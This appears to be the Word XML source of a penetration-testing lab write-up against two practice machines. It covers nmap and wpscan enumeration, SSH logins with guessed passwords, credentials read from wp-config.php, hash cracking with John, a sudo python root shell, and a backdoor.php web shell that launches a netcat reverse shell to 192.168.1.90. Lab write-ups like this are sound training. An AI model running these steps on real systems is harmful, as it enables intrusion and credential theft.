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rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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1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2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Critical Vulnerabilities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1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2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Exploitation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1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2</w:t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rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1fob9te" w:id="2"/>
      <w:bookmarkEnd w:id="2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32"/>
          <w:szCs w:val="32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nmap -sP 192.168.1.1-255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Reveals 192.168.1.110 and 192.168.1.115 are our target 1 and 2.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nmap -sV 192.168.1.110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nmap -sV 192.168.1.115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22 (ssh)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80 (http)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Port 111 (rpcbind)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Port 139 (netbios-ssn)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Port 445 (netbios-ssn)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Target 2</w:t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1. Port 22 (ssh)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2. Port 80 (http)</w:t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Port 111 (rpcbind)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Port 139 (netbios-ssn)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Port 445 (netbios-ssn)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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="000000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32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical Vulnerabilities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22 is open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this provides us with the ability to ssh in with discovered credentials.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80 is open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this provides us physical access to the http server / web browser.</w:t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Target 2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22 is open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this provides us with the ability to ssh in with discovered credentials.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Port 80 is open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this provides us physical access to the http server / web browser.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Exploitation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wpscan –-url http://192.168.1.110/wordpress -eu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Displays both users that we will target.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ssh michael@192.168.1.110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guessed the password and it ended up being correct.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Entry point.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Discovered that there is a second flag inside the /var/www directory.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Also, we discover inside the wordpress directory there is a wp-config.php file.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searched that file to reveal a few login / passwords.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cd wordpress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cat wp-config.php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Here we find the username is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and the password is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R@v3nSecurity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 This is the information we need to utilize mysql.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 order to get into mysql we ran the command mysql -u root -p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allowed us to enter mysql as root. Here we had access to more tables and databases.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After this, we wanted to find the databases and tables that were most likely to have the information we were seeking.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show databases;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use wordpress;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show tables;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select * from wp_posts;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reveals the third and fourth flags. ( Note: later we will find flag 4 in another area as well. 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we return to the tables and look around some more, we find that there is even more valuable information.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show tables;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select * from wp_users;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we can see both users michael and steven, and their corresponding hashes.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here we must crack those hashes with johntheripper.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Seeing as we already have michaels password, we will crack steven’s. So we will add the value to a file called wp_hashes.txt in the root directory.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nano wp_hashes.txt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After we write out the file, we will use the command john wp_hashes.txt , this will take some time, but the result will successfully crack steven’s hash.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then find that steven’s password is pink84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Now, we can ssh into steven’s account.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ssh steven@192.168.1.110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pink84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here we need to run the python script to get root access.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sudo python -c ‘import pty;pty.spawn(“/bin/bash”);’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695825" cy="527685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Capture the 4th flag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cat flag4.txt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Now, since we cannot ssh into target 2, we have to figure out a way in through a back door.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First,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nmap -sP 192.168.1.1-255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shows us our target 2 at 192.168.1.115 again.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nikto  -C all -h http://192.168.1.115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733925" cy="69723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gobuster dir -e -u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http://192.168.1.115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-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,txt,html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743450" cy="353377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676775" cy="31242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here, we try these different domains, and we can see in the vendor section there is a flag2.txt under the PATH directory.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After this, we have to create an exploit.sh file and set the target to the location we are attacking.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bash exploit.sh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192.168.1.115/backdoor.php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Now, we are ready to get a shell. Let’s start a netcat listener on port 4444.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nc -lnvp 4444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view-source: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http://192.168.1.115/backdoor.php?cmd=nc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192.168.1.90 4444 -e /bin/bash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724400" cy="35814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flag2.txt in the /var/www directory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cd /var/www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ls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cat flag2.txt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find -type f -iname ‘flag*’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Flag1.txt:192.168.1.110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nmap scanning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nmap -sP 192.168.1.1-255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nmap -sV 192.168.1.110</w:t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Flag2.txt:fc3fd58dcdad9ab23faca6e9a36e581c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wpscan --url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http://192.168.1.110/wordpress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-eu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/var/www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Flag3.txt:afc01ab56b50591e7dccf93122770cd2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MySQL / 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databases;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tables;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wp_posts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 this also displays flag4.txt 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Flag4.txt:715dea6c055b9fe3337544932f2941ce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 / python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python -c 'import pty;pty.spawn("/bin/bash");'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/root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hyperlink" Target="http://192.168.1.115/backdoor.php?cmd=n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1.115" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.110/wordpres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A+NrOQ4e7FVmrDLAx1xec9UjNA==">AMUW2mVT8DAfEeGSFOrD1uzhtwJSMVbP2lm+sJ3pxHp8ExYBtNk006W/Kv2/78s2Juxt5SquEsANnwordmAkAtWC+618+9i5YSQjQdGSZWcW5zBcxoKtsf2KgqRAtg0PjcEjA145zfJY/x1YE+3ZCqOm6eGwyQhr9z9BajZej0bA4Q3I+fEvhbw=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